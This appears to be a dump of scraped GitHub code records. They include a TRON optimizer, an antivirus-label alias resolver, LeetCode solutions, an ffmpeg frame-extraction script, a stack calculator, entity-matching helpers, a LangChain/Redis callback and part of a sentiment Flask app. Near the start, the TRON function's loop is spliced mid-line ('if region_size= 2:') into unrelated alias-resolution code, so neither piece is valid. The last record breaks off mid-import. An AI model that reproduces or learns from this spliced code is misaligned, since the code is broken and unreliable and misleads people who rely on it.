norm2_square_r_/norm2_square_r\n\t\tp *= beta\n\t\tp += r\n\t\tnorm2_square_r = norm2_square_r_\n\telse:\n\t\treturn x,True\n\treturn x,False\n\n\ndef TRON(X,y,w,sample_weights,C,sparse,conv_tol,max_iter,sigma=0.01,beta=0.9,eta0=1e-3,eta1=0.25,eta2=0.75,sigma1=0.25,sigma2=0.5,sigma3=4.0,max_region_size=1e10,zero_atol=1e-10):\n\t\"\"\"\n\t\tTRON算法。详细见论文<> 5.1节\n\t\t参数:\n\t\t\t①eta0,eta1,eta2,sigma1,sigma2,sigma3:浮点数。TRON算法用于权向量和region size的更新,具体见论文\n\t\t\t②max_region_size:浮点数,表示最大的region size。\n\t\"\"\"\n\tN,p = X.shape\n\tif sparse:\n\t\tX = csr_matrix(X)\n\t\tX_T = csr_matrix(X.T)\n\telse:\n\t\tX_T = X.T\n\t\n\tw_ = np.zeros(p*2,np.float64)\n\tif not w is None:\n\t\tpos_indices,neg_indices = w>0,w<0 \n\t\tw_[:p][pos_indices] = w[pos_indices]\n\t\tw_[p:][neg_indices] = w[neg_indices]\n\tw = w_\n\t\n\tC = C if sample_weights is None else C*sample_weights\n\n\texp_neg_Xy_dot_w = np.exp(-y*X.dot(w[:p]-w[p:]))\n\t\n\t#计算C*[σ(yw'x)-1]\n\tprobs_minus_one = (np.reciprocal(1+exp_neg_Xy_dot_w)-1)*C\n\t#计算C*{ σ(yw'x)*[1-σ(yw'x)] }\n\tD = np.reciprocal(exp_neg_Xy_dot_w+np.reciprocal(exp_neg_Xy_dot_w)+2.)*C\n\t#实际梯度为一长度为2p的向量,在这里我们只计算前p个元素组成的向量gradient\n\t#易得,实际梯度后p个元素组成的向量为-X_T.dot(probs_minus_one*y) + 1,即2-gradient\n\tgradient = X_T.dot(probs_minus_one*y) + 1\n\t\n\tloss = np.sum(C*np.log(exp_neg_Xy_dot_w+1)) + np.sum(w)\n\t#初始化∆为实际梯度的2-范数,见论文<>\n\tregion_size= sqrt( np.sum(gradient**2) + np.sum((2-gradient)**2) )\n\t\n\tcauchy_d = np.empty(p*2,np.float64)\n\tfor iter_index in range(max_iter):\n\t\tlambda_ = 1\n\t\t#利用线性搜索来计算cauchy point,见论文式(47)-(49)\n\t\twhile True:\n\t\t\tcauchy_d[:p] = np.clip(w[:p] - lambda_*(gradient),0,None) - w[:p]\n\t\t\tcauchy_d[p:] = np.clip(w[p:] - lambda_*(2-gradient),0,None) - w[p:]\n\t\t\t#计算实际梯度与cauchy_d的点积\n\t\t\tgradient_dot_d = np.dot(gradient,cauchy_d[:p]) + np.dot(2-gradient,cauchy_d[p:])\n\t\t\t#计算实际海森矩阵于cauchy_d的矩阵乘法\n\t\t\t#令H=X'DX,易得实际海森矩阵Hessian为\n\t\t\t# |\tH -H |\n\t\t\t# Hessian = | |\n\t\t\t# |\t-H H |\n\t\t\t#hess_dot_d = np.dot(| H -H |,cauchy_d)\n\t\t\t#易得,np.dot(Hessian,cauchy_d) = np.dot(cauchy_d[:p],hess_dot_d) - np.dot(cauchy_d[p:],hess_dot_d)\n\t\t\thess_dot_d = X_T.dot(D*X.dot(cauchy_d[:p])) - X_T.dot(D*X.dot(cauchy_d[p:]))\n\t\t\tqd = 0.5* ( np.dot(cauchy_d[:p],hess_dot_d) - np.dot(cauchy_d[p:],hess_dot_d) ) + gradient_dot_d\n\t\t\tcondition = gradient_dot_d\n\t\t\t\n\t\t\t#寻找满足qd <= sigma*condition且||cauchy_d||<=region_size的步长\n\t\t\tif less_equal(qd,sigma*condition) and less_equal(norm(cauchy_d),region_size):\n\t\t\t\tbreak\n\t\t\tlambda_ *= beta\n\n\t\tw_,d = w+cauchy_d,cauchy_d\n\t\t#计算F(cauchy_point)\n\t\tfree_indices = np.logical_not(np.isclose(w_,0,atol=zero_atol))\n\t\tn_pos_free = np.sum(free_indices[:p])\n\t\t\n\t\tgradient_free = np.hstack((gradient[free_indices[:p]],2-gradient[free_indices[p:]]))\n\t\tX_T_pos,X_T_neg = X_T[free_indices[:p]],X_T[free_indices[p:]]\n\t\tX_pos,X_neg = ( csr_matrix(X_T_pos.T),csr_matrix(X_T_neg.T) ) if sparse else (X_T_pos.T,X_T_neg.T)\n\t\thess_dot_d = np.hstack((hess_dot_d[free_indices[:p]],-hess_dot_d[free_indices[p:]]))\n\t\tgradient_qd_free = hess_dot_d + gradient_free\n\t\tfor t in range(2*p):\n\t\t\tif not np.any(free_indices):\n\t\t\t\td = w_ - w\n\t\t\t\tbreak\n\t\t\t\n\t\t\tv,early_stop = CG(X_T_pos,X_T_neg,X_pos,X_neg,D,gradient_free,gradient_qd_free,hess_dot_d,d[free_indices],n_pos_free,region_size,conv_tol)\n\t\t\tlambda_ = 1\n\t\t\t#线性搜索,见论文式(55)\n\t\t\twhile True:\n\t\t\t\td_ = d.copy()\n\t\t\t\tw_free = np.clip(w_[free_indices] + lambda_*v,0,None)\n\t\t\t\td_[free_indices] = w_free - w[free_indices]\n\t\t\t\t\n\t\t\t\tgradient_dot_d_ = np.dot(gradient,d_[:p]) + np.dot(2-gradient,d_[p:])\n\t\t\t\thess_dot_d_ = X_T.dot(D*X.dot(d_[:p])) - X_T.dot(D*X.dot(d_[p:]))\n\t\t\t\tqd_ = 0.5* ( np.dot(d_[:p],hess_dot_d_) - np.dot(d_[p:],hess_dot_d_) ) + gradient_dot_d_ \n\t\t\t\t\n\t\t\t\tcondition = np.dot(gradient_qd_free,d_[free_indices] - d[free_indices])\n\t\t\t\tif less_equal(qd_-qd,sigma*condition):\n\t\t\t\t\tw_[free_indices],d,qd = w_free,d_,qd_\n\t\t\t\t\tfree_indices = np.logical_not(np.isclose(w_,0,atol=zero_atol))\n\t\t\t\t\tn_pos_free = np.sum(free_indices[:p])\n\t\t\t\t\tgradient_free = np.hstack((gradient[free_indices[:p]],2-gradient[free_indices[p:]]))\n\t\t\t\t\tX_T_pos,X_T_neg = X_T[free_indices[:p]],X_T[free_indices[p:]]\n\t\t\t\t\tX_pos,X_neg = ( csr_matrix(X_T_pos.T),csr_matrix(X_T_neg.T) ) if sparse else (X_T_pos.T,X_T_neg.T)\n\t\t\t\t\thess_dot_d = np.empty(np.sum(free_indices),np.float64)\n\t\t\t\t\thessian_dot(X_T_pos,X_T_neg,X,X,D,d,n_pos_free,hess_dot_d,p)\n\t\t\t\t\tgradient_qd_free = hess_dot_d + gradient_free\n\t\t\t\t\tbreak\n\n\t\t\t\tlambda_ *= beta\n\t\t\t\n\t\t\tif less_equal(norm(gradient_qd_free),conv_tol*norm(gradient_free)) or early_stop:\n\t\t\t\td = w_ - w\n\t\t\t\tbreak\n\t\t\n\t\tnew_w = w + d\n\n\t\texp_neg_Xy_dot_w = np.exp(-y*X.dot(new_w[:p]-new_w[p:]))\n\t\tnew_loss = np.sum(C*np.log(exp_neg_Xy_dot_w+1)) + np.sum(new_w)\n\t\t#计算reduction ratio,见论文式(45)\n\t\trho = (new_loss - loss)/qd\n\t\t#更新权向量,见论文式(46)\n\t\tif rho>eta0:\n\t\t\tw,loss = new_w,new_loss\n\t\t\tD = np.reciprocal(exp_neg_Xy_dot_w+np.reciprocal(exp_neg_Xy_dot_w)+2.)*C\n\t\t\tprobs_minus_one = (np.reciprocal(1+exp_neg_Xy_dot_w)-1)*C\n\t\t\tgradient = X_T.dot(probs_minus_one*y) + 1\n\t\t\n\t\t#更新region size\n\t\tif region_size= 2:\n return\n elif len(canonical_toks) == 1:\n canonical_tok = canonical_toks[0]\n\n # Update canonical token info\n self.av_stats.token_md5s[canonical_tok] = all_scan_idxs\n self.av_stats.related_tokens[canonical_tok] = all_related_tokens\n self.token_aliases[canonical_tok] = all_aliases\n\n # Make all other aliases reference canonical token\n for tok in self.token_aliases[tok1] | self.token_aliases[tok2]:\n if tok == canonical_tok:\n continue\n self.av_stats.token_md5s[tok] = self.av_stats.token_md5s[canonical_tok]\n self.av_stats.related_tokens[tok] = self.av_stats.related_tokens[canonical_tok]\n self.token_aliases[tok] = self.token_aliases[canonical_tok]\n\n return\n\n\n def edit_pct(self, tok1, tok2):\n \"\"\"Compute edit distance percentage between tokens.\n\n Many aliases have very similar spellings. Examples include adding\n digits/characters, using slight spelling changes, reversing the name of\n the token, or abbreviating parts of the token.\n \"\"\"\n\n # Compute edit distance between tok1 and tok2\n # Divide by length of longest token name to get edit perecent\n # Edit percent has range [0.0, 1.0]\n # 0.0 -> tok1 and tok2 are identical, 1.0 -> tok1 and tok2 are distant\n tok_short, tok_long = sorted([tok1, tok2], key=lambda l:len(l))\n min_len, max_len = len(tok_short), len(tok_long)\n edit_pct = editdistance.eval(tok1, tok2) / max_len\n\n # Many aliases are the names of tokens backwards, or are anagrams.\n # Override edit pct for anagrams.\n if min_len >= 6 and edit_pct > 0.25 and sorted(tok1) == sorted(tok2):\n edit_pct = 0.25\n\n # Override edit pct for tokens that are subsets of other tokens\n lcs_len = pylcs.lcs_sequence_length(tok_long, tok_short)\n if min_len >= 4 and lcs_len == min_len and edit_pct > 0.25:\n edit_pct = 0.25\n\n return edit_pct\n\n\n def co_occur_pct(self, tok1, tok2):\n \"\"\"Returns the co-occurrence percentage for two tokens.\"\"\"\n\n # Get scan reports that both tokens occur in\n tok1_scans = self.av_stats.token_md5s[tok1]\n tok2_scans = self.av_stats.token_md5s[tok2]\n intersect = len(tok1_scans.intersection(tok2_scans))\n min_occur, _ = sorted([len(tok1_scans), len(tok2_scans)])\n co_occur_pct = intersect / min_occur\n return co_occur_pct\n\n\n def get_total_count(self, tok):\n \"\"\"Returns the total number of scan reports that the token and any of\n its known aliases appears in.\"\"\"\n return len(self.av_stats.token_md5s[tok])\n\n\n def get_sorted_aliases(self, fmt):\n \"\"\"Returns a list of tuples, where each tuple contains a known cluster\n of trivial/sibling aliases. Each cluster is sorted by largest ->\n smallest token, and the clusters are sorted from largest -> smallest\n alias cluster.\n\n Arguments:\n fmt -- The token vocab\n \"\"\"\n\n # Get all known tokens for fmt\n known_tokens = set(self.av_stats.fmt_tokens[fmt].values())\n\n # Get set of all known trivial/sibling alias clusters\n aliases = set()\n for tok in known_tokens:\n tok_aliases = list(sorted(self.token_aliases[tok]))\n tok_aliases.sort(key=lambda tok: self.av_stats.token_counts[tok],\n reverse=True)\n aliases.add(tuple(tok_aliases))\n\n # Sort by size of alias cluster\n aliases = list(aliases)\n aliases.sort(key=lambda a: self.get_total_count(a[0]), reverse=True)\n return aliases\n\n\n def resolve_trivial_aliases(self, fmt):\n \"\"\"Resolve trivial aliases - token ending with an extra digit.\n\n Arguments:\n fmt -- The token vocab\n \"\"\"\n\n # Get list of all known tokens in vocab\n known_tokens = self.av_stats.fmt_tokens[fmt]\n expanded_tokens = known_tokens.copy()\n if fmt in [CAT, TGT]:\n expanded_tokens.update(self.av_stats.fmt_tokens[PRE])\n\n # Identify tokens that are variants of known tokens which have\n # predictable substring suffixes/prefixes\n to_resolve = []\n for tok in expanded_tokens:\n if len(tok) <= 6:\n continue\n\n # Identical except for an extra digit\n if tok[-1].isnumeric() and tok[:-1] in known_tokens:\n to_resolve.append((tok, tok[:-1]))\n continue\n\n # Identical except for an extra character\n if len(tok) >= 10 and tok[:-1] in known_tokens:\n to_resolve.append((tok, tok[:-1]))\n continue\n\n # Identical except for a prefix\n found_pre = False\n for pre in self.token_substrings[\"PRE_SUBSTR\"]:\n if len(tok) > len(pre) and tok.endswith(pre):\n if tok[len(pre):] in known_tokens:\n to_resolve.append((tok, tok[len(pre):]))\n found_pre = True\n break\n if found_pre:\n continue\n\n # Identical except for a suffix\n for suf in self.token_substrings[\"SUF_SUBSTR\"]:\n if len(tok) > len(suf) and tok.endswith(suf):\n if tok[:len(suf)*-1] in known_tokens:\n to_resolve.append((tok, tok[:len(suf)*-1]))\n break\n\n # Resolve trivial aliases\n num_resolved = 0\n for tok1, tok2 in to_resolve:\n self.resolve_alias_pair(tok1, tok2)\n num_resolved += 1\n\n return\n\n\n def resolve_child_aliases(self, fmt, E=0.4, C=0.5):\n \"\"\"Resolves 'parent/child' aliases.\n\n Due to differences in granualirity, one token have a one-way\n relationship with another token. By this, we mean that one token (which\n we call a child token) is smaller than a second (a parent token), and\n the parent token almost always co-occurs in scan reports containing\n the child token. However, since the parent token is more widespread,\n there are scan reports where it occurs but the child token does not.\n\n We identify parent/child aliases as pairs of tokens with high weak\n co-occurrence percentage and low token edit percent.\n\n Arguments:\n fmt -- The token vocab\n E -- Threshold for edit percent\n C -- Threshold for combined weak co-occurrence percentage and edit\n percentage, (1 - edit_pct) * weak_co_occur_pct\n \"\"\"\n\n # Sort tokens by count (largest -> smallest)\n # Give priority to known canonical tokens\n known_canonical = self.known_canonical_tokens[fmt]\n unknown_tokens = [tok for tok in self.av_stats.fmt_tokens[fmt]\n if tok not in known_canonical]\n known_canonical = list(known_canonical)\n known_canonical.sort(key=lambda f: self.av_stats.token_counts[f],\n reverse=True)\n unknown_tokens.sort(key=lambda f: self.av_stats.token_counts[f],\n reverse=True)\n sorted_tokens = known_canonical + unknown_tokens\n remaining_tokens = set(sorted_tokens)\n if fmt in [CAT, TGT]:\n remaining_tokens.update(self.av_stats.fmt_tokens[PRE])\n\n # Iterate over tokens\n for tok1 in sorted_tokens:\n remaining_tokens.remove(tok1)\n\n # Iterate over every token known to co-occur with tok1\n for tok2 in self.av_stats.related_tokens[tok1]:\n if tok2 not in remaining_tokens:\n continue\n\n # Compute edit percentage between tok1 and tok2\n edit_pct = self.edit_pct(tok1, tok2)\n if edit_pct >= E:\n continue\n\n # Use a combination of edit pct and co-occurrence percent for\n # identifying parent/child aliases\n co_occur_pct = self.co_occur_pct(tok1, tok2)\n if (1 - edit_pct) * co_occur_pct >= C:\n self.child_aliases[tok1].add(tok2)\n self.parent_aliases[tok2].add(tok1)\n\n return\n\n\n def get_fmt_alias_mapping(self, fmt, E=0.6):\n \"\"\"Returns dict where the key is the canonical (most common) name of a\n token, and the value is a list of its aliases.\n\n Argument:\n fmt -- Current token vocabulary (e.g. CAT, TGT, etc.)\n E -- Threshold based on edit score and co-occurrence percentage\n \"\"\"\n\n # Sort tokens by count (largest -> smallest)\n # Give priority to known canonical tokens\n known_canonical = self.known_canonical_tokens[fmt]\n unknown_tokens = [tok for tok in self.av_stats.fmt_tokens[fmt]\n if tok not in known_canonical]\n known_canonical = list(known_canonical)\n known_canonical.sort(key=lambda f: self.av_stats.token_counts[f],\n reverse=True)\n unknown_tokens.sort(key=lambda f: self.av_stats.token_counts[f],\n reverse=True)\n sorted_tokens = known_canonical + unknown_tokens\n remaining_tokens = set(sorted_tokens)\n\n # Iterate over all tokens\n fmt_alias_mapping = {}\n for tok1 in sorted_tokens:\n if tok1 not in remaining_tokens:\n continue\n remaining_tokens.remove(tok1)\n\n # Form queue from current token's aliases and child aliases\n alias_queue = self.token_aliases[tok1]\n alias_queue = alias_queue.union(self.child_aliases[tok1])\n alias_queue = list(alias_queue)\n\n # Recursively get all children of the canonical token\n # For CAT and TGT tokens, stop recursing if the alias would have\n # too large of an edit distance from the canonical token\n aliases = set()\n while len(alias_queue):\n tok2 = alias_queue.pop(0)\n if tok2 not in remaining_tokens or tok2 in aliases:\n continue\n\n # Don't expand tok2 if it (or its aliases) have a different\n # canonical token\n has_different_canonical = False\n for tok in self.token_aliases[tok2]:\n if (self.fmt_alias_mapping[fmt].get(tok) is not None and\n self.fmt_alias_mapping[fmt][tok] != tok1):\n has_different_canonical = True\n if has_different_canonical:\n continue\n\n # Expand queue with aliases of tok2\n alias_queue += list(self.token_aliases[tok2])\n alias_queue += list(self.child_aliases[tok2])\n aliases.add(tok2)\n\n # Add canonical token and aliases to mapping\n if not len(aliases):\n continue\n for tok2 in aliases:\n remaining_tokens.remove(tok2)\n aliases = [tok for tok in aliases\n if self.fmt_alias_mapping[fmt].get(tok) is None]\n fmt_alias_mapping[tok1] = sorted(aliases)\n\n return fmt_alias_mapping\n\n\n def write_alias_mapping(self, alias_file):\n \"\"\"Write the generated alias mapping to alias_file.\"\"\"\n\n write_fmts = [CAT, TGT, PACK]\n with open(alias_file, \"w\") as f:\n for fmt in write_fmts:\n f.write(\"[{}]\\n\".format(fmt))\n sorted_fmt_aliases = list(self.fmt_alias_mapping[fmt].items())\n sorted_fmt_aliases.sort(key=lambda l:l[1])\n for alias, canonical_token in sorted_fmt_aliases:\n f.write(\"{}\\t{}\\n\".format(alias, canonical_token))\n f.write(\"\\n\")\n return\n","repo_name":"NeuromorphicComputationResearchProgram/ClarAVy","sub_path":"claravy/avalias.py","file_name":"avalias.py","file_ext":"py","file_size_in_byte":17564,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"84"} +{"seq_id":"36914156752","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n给定一棵 N 叉树的根节点 root ,返回该树的深拷贝(克隆)。\n\nN 叉树的每个节点都包含一个值( int )和子节点的列表( List[Node] )。\n\nclass Node {\n public int val;\n public List children;\n}\nN 叉树的输入序列用层序遍历表示,每组子节点用 null 分隔(见示例)。\n\n进阶:你的答案可以适用于克隆图问题吗?\n\n \n\n示例 1:\n\n\n\n输入:root = [1,null,3,2,4,null,5,6]\n输出:[1,null,3,2,4,null,5,6]\n示例 2:\n\n\n\n输入:root = [1,null,2,3,4,5,null,null,6,7,null,8,null,9,10,null,null,11,null,12,null,13,null,null,14]\n输出:[1,null,2,3,4,5,null,null,6,7,null,8,null,9,10,null,null,11,null,12,null,13,null,null,14]\n \n\n提示:\n\n给定的 N 叉树的深度小于或等于 1000。\n节点的总个数在 [0, 10^4] 之间\n\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/clone-n-ary-tree\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\n\"\"\"\n\n\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children if children is not None else []\n\n\nclass Solution:\n def cloneTree(self, root: 'Node') -> 'Node':\n if not root:\n return None\n result = Node(root.val)\n for i in root.children:\n # 这里使用的是递归方式,获取下一个节点\n result.children.append(self.cloneTree(i))\n\n return result\n","repo_name":"Carmenliukang/leetcode","sub_path":"算法分析和归类/树/克隆 N 叉树.py","file_name":"克隆 N 叉树.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"37911189112","text":"\ndef isValid(s: str) -> bool:\n #1. list를 사용하고 일일이 비교하는 코드\n # stack = list()\n\n # for i in range(len(s)):\n # if s[i] == '(' or s[i] == '[' or s[i] == '{':\n # stack.append(s[i])\n # else:\n # if len(stack) == 0:\n # return False\n # last = stack.pop()\n # if (last == '(' and s[i] != ')') or \\\n # (last == '[' and s[i] != ']') or \\\n # (last == '{' and s[i] != '}'):\n # return False\n # if len(stack) != 0:\n # return False\n # return True\n #2. dict mapping으로 비교를 간소화\n stack = []\n table = {\n ')': '(',\n '}': '{',\n ']': '['\n }\n\n #스택 이용 예외 처리 및 일치여부 판별\n for char in s:\n if char not in table:\n stack.append(char)\n elif not stack or table[char] != stack.pop():\n return False\n return len(stack) == 0","repo_name":"jungmyeong96/daily_algorithms","sub_path":"Leetcode/StackNQueue/20_valid_parentheses.py","file_name":"20_valid_parentheses.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"18321549251","text":"\"\"\"\n THIS CODE REQUIRES FFMPEG BINARY INSTALLED\n\"\"\"\n\nimport yaml\nimport os\nimport json\nimport argparse\n\ndef __make_frames(config_path: str) -> None:\n with open(config_path) as config_file:\n config = yaml.safe_load(config_file)\n \n videos_path = config['split_2m']['vids_2m_path']\n labels_path = config['make_frames']['labels_path']\n frames_path = config['make_frames']['frames_path']\n cmd = 'ffmpeg -i {0} -vf select=\"eq(n\\,{1})\" \\\n-vsync vfr -q:v 2 -vcodec png {2}'\n\n for label in list(filter(lambda x: x.endswith('.json'), \\\n os.listdir(labels_path))):\n indicies = __get_indicies(os.path.join(labels_path, label))\n for n, idx in enumerate(indicies):\n out_file = os.path.join(frames_path, \\\n label.split('.')[0]+'_'+str(n)+'.png')\n os.system(cmd.format(os.path.join(videos_path, \\\n __get_video_name(label)), idx, out_file))\n\ndef __get_indicies(label_path: str) -> list:\n with open(label_path) as labels_file:\n labels = json.load(labels_file)\n \n indicies = []\n for idx in labels['frames']:\n idx = idx['index']\n indicies.append(idx)\n return indicies\n\ndef __get_video_name(label: str) -> str:\n return label.split('.')[0] + '.mp4'\n\nif __name__ == '__main__':\n args_parser = argparse.ArgumentParser()\n args_parser.add_argument('--config', dest='config', required=True)\n args = args_parser.parse_args() \n\n __make_frames(args.config)","repo_name":"wonderooo/veles","sub_path":"src/data/make_frames.py","file_name":"make_frames.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"1376432094","text":"#Hit the number\nimport random\nnumber=random.randint(0,100)\nfinish=False\n\nwhile(finish==False):\n usernumber=input(\"What number i'm thinking now?? \")\n usernumber=int(usernumber)\n\n if usernumber==number:\n print(\"Yes!! Congratulations my friend!\")\n finish=True\n elif usernumber 1:\n first = self.stack.pop()\n second = self.stack.pop()\n self.stack.append(first + second)\n else:\n raise LackOfElementsException\n\n def minus(self):\n \"\"\"\n 요소가 1개면 오류 리턴\n \"\"\"\n if len(self.stack) > 1:\n first = self.stack.pop()\n second = self.stack.pop()\n self.stack.append(first - second)\n else:\n raise LackOfElementsException\n\n def push(self, num: int):\n self.stack.append(num)\n\n def pop(self):\n \"\"\"\n 요소가 없으면 오류 리턴\n \"\"\"\n if self.stack:\n return self.stack.pop()\n raise NoElementException\n\n def duplicate(self):\n \"\"\"\n 요소가 없으면 오류 리턴\n \"\"\"\n if self.stack:\n return self.stack.append(self.stack[-1])\n raise NoElementException\n\n def result(self):\n try:\n for s in self.string:\n if s == '+':\n self.plus()\n elif s == '-':\n self.minus()\n elif s == 'POP':\n self.pop()\n elif s == 'DUP':\n self.duplicate()\n else:\n self.push(int(s))\n return self.stack.pop()\n except (NoElementException, LackOfElementsException):\n return -1\n\n\ndef solution(S):\n my_stack = MyStack(S)\n return my_stack.result()\n\n\nprint(solution(\"4 5 6 - 7 +\"))\nprint(solution(\"13 DUP 4 POP 5 DUP + DUP + -\"))\nprint(solution(\"5 6 + -\"))\nprint(solution(\"3 DUP 5 - -\"))\n\n\n\n","repo_name":"Dokeey/CodingTest","sub_path":"codility/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"43252243197","text":"import os\nimport sys\nimport torch\nimport random\nimport numpy as np\n\n\nfrom pretrain import PretrainModel\nfrom dataset import PretrainDataset\nfrom torch.utils import data\n\ndef set_seed(seed: int):\n \"\"\"\n Helper function for reproducible behavior to set the seed in ``random``, ``numpy``, ``torch``\n \"\"\"\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n\ndef sequentialize_ditto(instance, tableA, tableB):\n '''\n Args:\n instance(string): The test instance in the format of left id, right id, label\n tableA/tableB(dataframe): The dataframe of records in the left/right table\n Returns:\n line(str): The sequentialized result in the format of Ditto\n '''\n left = \"\"\n right = \"\"\n idxA = instance[0]\n idxB = instance[1]\n label = str(instance[2])\n header = list(tableA)\n for i,attr in enumerate(header):\n left += \" COL \"+str(attr)+\" VAL \"+str(tableA.iloc[idxA, i])\n right += \" COL \"+str(attr)+\" VAL \"+str(tableB.iloc[idxB, i])\n line = left.strip()+\"\\t\"+right.strip()+\"\\t\"+label\n return line\n\n \ndef load_teacher_ditto(lm, model_path, config, gpu=True, fp16=False):\n if not os.path.exists(model_path):\n raise ModelNotFoundError(model_path)\n if gpu:\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n else:\n device = 'cpu'\n model = PretrainModel(device=device, lm=lm)\n saved_state = torch.load(model_path, map_location=lambda storage, loc: storage)\n model.load_state_dict(saved_state)\n model = model.to(device)\n if fp16 and 'cuda' in device:\n from apex import amp\n model = amp.initialize(model, opt_level='O2')\n return model\n \n \ndef student_ground_truth_ditto(model, records, args):\n '''\n model (MultiTaskNet): The trained Ditto model\n records (Array): The test sets, each item is in the Ditto format\n args(defaultdict): the arguments necessaqry to eval the model\n '''\n dataset = PretrainDataset(records, args['vocab'], args['name'], lm=args['lm'], max_len=args['max_len'])\n iterator = data.DataLoader(dataset=dataset,\n batch_size=args['batch_size'],\n shuffle=False,\n num_workers=0,\n collate_fn=PretrainDataset.pad)\n Y_hat = []\n with torch.no_grad():\n for i, batch in enumerate(iterator):\n words, x, is_heads, tags, mask, y, seqlens, taskname = batch\n taskname = taskname[0]\n _, _, y_hat = model(x, y, task=taskname) # y_hat: (N, T)\n Y_hat.extend(y_hat.cpu().numpy().tolist())\n\n results = []\n for i in range(len(records)):\n pred = dataset.idx2tag[Y_hat[i]]\n results.append(str(pred))\n return results\n\n\ndef predict_ditto(inputs, config, model, batch_size=64):\n set_seed(20220104)\n dataset = PretrainDataset(inputs, config['vocab'], config['name'], lm=config['lm'], max_len=config['max_len'])\n iterator = data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=False,\n num_workers=0,\n collate_fn=PretrainDataset.pad)\n Y_logits = []\n Y_hat = []\n with torch.no_grad():\n for i, batch in enumerate(iterator):\n words, x, is_heads, tags, mask, y, seqlens, taskname = batch\n taskname = taskname[0]\n logits, _, y_hat = model(x, y, task=taskname) # y_hat: (N, T)\n Y_logits += logits.softmax(-1).cpu().numpy().tolist()\n Y_hat.extend(y_hat.cpu().numpy().tolist())\n\n results = []\n for i in range(len(inputs)):\n pred = dataset.idx2tag[Y_hat[i]]\n results.append(pred)\n\n return results, Y_logits","repo_name":"megagonlabs/minun","sub_path":"ditto_helper.py","file_name":"ditto_helper.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"34976627750","text":"import redis\nfrom langchain.callbacks.manager import CallbackManager\nfrom langchain.llms import LlamaCpp\nfrom langchain.callbacks.streaming_aiter import AsyncIteratorCallbackHandler\nfrom langchain.callbacks.manager import CallbackManager\nfrom langchain.callbacks.base import BaseCallbackHandler\nimport os\nimport json\nfrom dotenv import load_dotenv\nload_dotenv()\n\n\n\nclass MyCustomHandler(BaseCallbackHandler):\n # Create a connection to Redis\n def __init__(self):\n redisURL = os.getenv(\"redisURL\")\n self.r = redis.Redis(host=redisURL, port=6379, decode_responses=True)\n\n def on_llm_new_token(self, token: str, **kwargs) -> None:\n # Set a value\n if(len(kwargs.get(\"tags\")) == 0):\n return\n ret = {\"id\":kwargs.get(\"tags\")[0],\"chatNum\":kwargs.get(\"tags\")[1], \"token\":token}\n self.r.append(kwargs.get(\"tags\")[0], json.dumps(ret) )\n self.r.expire(kwargs.get(\"tags\")[0],12000)\n \n# Callbacks support token-wise streaming\n\n\n\nclass common(object):\n callback_manager = CallbackManager([MyCustomHandler()])\n\n def __init__(self):\n redisURL = os.getenv(\"redisURL\")\n self.chatredis = redis.Redis(host=redisURL, db=0, port=6379, decode_responses=True)\n self.imageredis = redis.Redis(host=redisURL, db=2, port=6379, decode_responses=True)\n path = os.getenv(\"model\")\n print(path)\n #n_gpu_layer = 1\n\n# n_batch = 128\n #print(os.getenv(\"model\"))\n self.llm = LlamaCpp(\n model_path=path,\n temperature=0.75,\n #max_tokens=2000,\n #top_p=1,\n callbacks=[MyCustomHandler()],\n #verbose=True,\n # n_gpu_layers=n_gpu_layer,\n # n_batch=n_batch,\n #n_ctx=2048,\n #f16_kv=True,\n )\n","repo_name":"Microshak/LLM_Chat_UI","sub_path":"chat/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"72212999311","text":"import re\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\nimport string\nimport nltk\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport pandas as pd\nimport joblib\nimport nltk\nnltk.download('stopwords')\nnltk.download('punkt')\n#---------------------------importing data and training the ocuntvectorizer----------------------------------------------\ndf=pd.read_csv('preprocessed_twitter_data.csv')\n\ndf = df.dropna(subset=['clean_tweet'])\ndf = df.reset_index(drop=True)\n\nbow_vectorizer = CountVectorizer(max_df=0.90,min_df=2,max_features=5000, stop_words='english')\n\nbow_vectorizer.fit(df['clean_tweet'])\n#----------------------------------Defining preprocessing functions-------------------------------------------\nnltk.download('wordnet')\n\nlemma = WordNetLemmatizer()\nstopwords = set(stopwords.words('english'))\n\ndef cleaning_URLs(data):\n txt = re.sub(r\"(https?://|www\\.)\\S+\", ' ', data)\n return re.sub(r\"(www\\.|https?://)\", ' ', txt)\n\ndef remove_punctuation(txt):\n txt_nopunct = \"\".join([c for c in txt if c not in string.punctuation])\n return txt_nopunct\n\ndef cleaning_numbers(txt):\n return re.sub('[0-9]+', '', txt)\n\ndef remove_stopwords(txt):\n txt_clean = \" \".join([word for word in txt.split() if word not in stopwords])\n return txt_clean\n\ndef remove_repeating_characters(text):\n cleaned_text = re.sub(r'(\\w)\\1+', r'\\1', text)\n return cleaned_text\n\ndef tokenize(txt):\n tokens = word_tokenize(txt)\n return tokens\n\ndef lemmatization(token_txt):\n text = [lemma.lemmatize(word) for word in token_txt]\n return text\n\nmodel=joblib.load('BOW_model.joblib')\n#-----------------------------------------------------Flask App---------------------------------------------------------------------------------------\n\n\nfrom 